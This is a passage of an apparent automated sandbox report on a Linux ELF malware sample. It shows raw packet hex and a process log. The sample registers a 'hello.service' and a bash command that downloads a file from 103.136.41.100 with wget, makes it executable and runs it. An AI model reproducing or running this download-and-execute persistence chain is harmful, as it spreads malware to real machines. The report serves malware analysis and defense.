              Data Ascii: 04@O-XMP@"980C 8(0C , 00 04 08 0<
              Jan 11, 2025 05:51:24.169758081 CET1236INData Raw: 0f 00 00 e2 56 0e 80 e2 03 00 80 e2 00 08 a0 e1 20 34 a0 e1 ff 3c 03 e2 20 3c 83 e1 43 14 a0 e1 2a 20 85 e2 2a 30 c5 e5 04 c0 a0 e3 01 10 c2 e5 08 30 a0 e3 0a 20 a0 e3 02 00 a0 e3 2e 30 c5 e5 2f 20 c5 e5 2c c0 c5 e5 2d 00 c5 e5 a9 22 00 eb 06 30
              Data Ascii: V 4< <C* *00 .0/ ,-"0;0 004`80: 9 T0@YT@}0YT021C0 QR`@wU"HD@D@4\0YHPQ
              Jan 11, 2025 05:51:24.169770956 CET1236INData Raw: 0c 20 84 e5 80 11 41 e0 03 10 81 e0 08 c0 9d e5 10 20 91 e5 3c 30 a0 e3 14 c0 c4 e5 03 30 c4 e5 10 20 84 e5 02 50 c4 e5 04 50 c4 e5 05 50 c4 e5 06 50 c4 e5 07 50 c4 e5 14 10 84 e2 0d 30 d1 e5 10 00 9d e5 20 30 c3 e3 80 32 83 e1 0d 30 c1 e5 0d 20
              Data Ascii: A <00 PPPPP0 020 0 " 0010 0P L40 L 000 000 $ p P) (p
              Jan 11, 2025 05:51:24.169776917 CET1236INData Raw: 54 10 8d e5 58 20 8d e5 0a 18 a0 01 28 20 8a 02 64 40 8d e5 30 10 8d 05 14 b0 8a 02 2c 20 8d 05 8c 00 00 0a 0a 38 a0 e1 01 2c a0 e1 58 50 9d e5 0a 07 83 e2 22 28 a0 e1 2c 9c 82 e1 05 1c a0 e1 30 30 8d e5 3c c0 9d e5 00 34 a0 e1 23 38 a0 e1 21 18
              Data Ascii: TX ( d@0, 8,XP"(,00<4#8! |.@LPD 0 0P`GI$K4 P(`\$ 0^58Pd A00@00
              Jan 11, 2025 05:51:24.169783115 CET1236INData Raw: 44 00 8d e5 0c 20 a0 e3 00 30 a0 e3 04 00 a0 e1 81 f7 ff eb 05 10 a0 e1 48 00 8d e5 0d 20 a0 e3 00 30 a0 e3 04 00 a0 e1 7b f7 ff eb 05 10 a0 e1 00 20 a0 e3 02 3c a0 e3 00 b0 a0 e1 04 00 a0 e1 75 f7 ff eb 05 10 a0 e1 04 20 a0 e3 01 30 a0 e3 00 a0
              Data Ascii: D 0H 0{ <u 0o$0 O\ 2pLd0 # 1p<0X0@,.(X0P8`@PT
              Jan 11, 2025 05:51:24.174673080 CET1236INData Raw: b5 ff ff 0a f3 1d 00 eb 08 00 85 e5 b2 ff ff ea 4c 00 9d e5 15 2f 00 eb 64 d0 8d e2 f0 8f bd e8 40 86 02 00 f0 4f 2d e9 ff 40 02 e2 03 60 a0 e1 be dd 4d e2 01 38 a0 e3 0c d0 4d e2 01 70 a0 e1 01 30 43 e2 06 10 a0 e1 02 20 a0 e3 04 00 a0 e1 3f f6
              Data Ascii: L/d@O-@`M8Mp0C ?X 09[>0 0 0*T3%H0*@%\Tl?: E


              System Behavior

              Start time (UTC):04:51:07
              Start date (UTC):11/01/2025
              Path:/tmp/3.elf
              Arguments:/tmp/3.elf
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):04:51:11
              Start date (UTC):11/01/2025
              Path:/tmp/3.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):04:51:11
              Start date (UTC):11/01/2025
              Path:/bin/sh
              Arguments:sh -c "systemctl daemon-reload > /dev/null 2>&1"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):04:51:11
              Start date (UTC):11/01/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):04:51:11
              Start date (UTC):11/01/2025
              Path:/usr/bin/systemctl
              Arguments:systemctl daemon-reload
              File size:996584 bytes
              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

              Start time (UTC):04:51:12
              Start date (UTC):11/01/2025
              Path:/tmp/3.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):04:51:12
              Start date (UTC):11/01/2025
              Path:/bin/sh
              Arguments:sh -c "systemctl start hello.service > /dev/null 2>&1"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):04:51:12
              Start date (UTC):11/01/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):04:51:12
              Start date (UTC):11/01/2025
              Path:/usr/bin/systemctl
              Arguments:systemctl start hello.service
              File size:996584 bytes
              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

              Start time (UTC):04:51:08
              Start date (UTC):11/01/2025
              Path:/usr/bin/xfce4-panel
              Arguments:-
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              Start time (UTC):04:51:08
              Start date (UTC):11/01/2025
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              Start time (UTC):04:51:08
              Start date (UTC):11/01/2025
              Path:/usr/bin/xfce4-panel
              Arguments:-
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              Start time (UTC):04:51:08
              Start date (UTC):11/01/2025
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              Start time (UTC):04:51:08
              Start date (UTC):11/01/2025
              Path:/usr/bin/xfce4-panel
              Arguments:-
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              Start time (UTC):04:51:08
              Start date (UTC):11/01/2025
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              Start time (UTC):04:51:08
              Start date (UTC):11/01/2025
              Path:/usr/bin/xfce4-panel
              Arguments:-
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              Start time (UTC):04:51:08
              Start date (UTC):11/01/2025
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              Start time (UTC):04:51:09
              Start date (UTC):11/01/2025
              Path:/usr/bin/xfce4-panel
              Arguments:-
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              Start time (UTC):04:51:09
              Start date (UTC):11/01/2025
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              Start time (UTC):04:51:09
              Start date (UTC):11/01/2025
              Path:/usr/bin/xfce4-panel
              Arguments:-
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              Start time (UTC):04:51:09
              Start date (UTC):11/01/2025
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              Start time (UTC):04:51:12
              Start date (UTC):11/01/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):04:51:12
              Start date (UTC):11/01/2025
              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
              File size:22760 bytes
              MD5 hash:3633b075f40283ec938a2a6a89671b0e

              Start time (UTC):04:51:12
              Start date (UTC):11/01/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):04:51:12
              Start date (UTC):11/01/2025
              Path:/bin/bash
              Arguments:/bin/bash -c "sleep 10; rm -rf /tmp/3; wget http://103.136.41.100/3 -O /tmp/3; chmod 777 /tmp/3; /tmp/3 .p1 > /dev/null 2>&1;"
              File size:1183448 bytes
              MD5 hash:7063c3930affe123baecd3b340f1ad2c

              Start time (UTC):04:51:12
              Start date (UTC):11/01/2025
              Path:/bin/bash
              Arguments:-
              File size:1183448 bytes
              MD5 hash:7063c3930affe123baecd3b340f1ad2c

              Start time (UTC):04:51:12
              Start date (UTC):11/01/2025
              Path:/usr/bin/sleep
              Arguments:sleep 10
              File size:39256 bytes
              MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

              Start time (UTC):04:51:22
              Start date (UTC):11/01/2025
              Path:/bin/bash
              Arguments:-
              File size:1183448 bytes
              MD5 hash:7063c3930affe123baecd3b340f1ad2c

              Start time (UTC):04:51:22
              Start date (UTC):11/01/2025
              Path:/usr/bin/rm
              Arguments:rm -rf /tmp/3
              File size:72056 bytes
              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

              Start time (UTC):04:51:22
              Start date (UTC):11/01/2025
              Path:/bin/bash
              Arguments:-
              File size:1183448 bytes
              MD5 hash:7063c3930affe123baecd3b340f1ad2c

              Start time (UTC):04:51:22
              Start date (UTC):11/01/2025
              Path:/usr/bin/wget
              Arguments:wget http://103.136.41.100/3 -O /tmp/3
              File size:548568 bytes
              MD5 hash:996940118df7bb2aaa718589d4e95c08

              Start time (UTC):04:51:23
              Start date (UTC):11/01/2025
              Path:/bin/bash
              Arguments:-
              File size:1183448 bytes
              MD5 hash:7063c3930affe123baecd3b340f1ad2c

              Start time (UTC):04:51:23
              Start date (UTC):11/01/2025
              Path:/usr/bin/chmod
              Arguments:chmod 777 /tmp/3
              File size:63864 bytes
              MD5 hash:739483b900c045ae1374d6f53a86a279

              Start time (UTC):04:51:23
              Start date (UTC):11/01/2025
              Path:/bin/bash
              Arguments:-
              File size:1183448 bytes
              MD5 hash:7063c3930affe123baecd3b340f1ad2c

              Start time (UTC):04:51:23
              Start date (UTC):11/01/2025
              Path:/tmp/3
              Arguments:/tmp/3 .p1
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1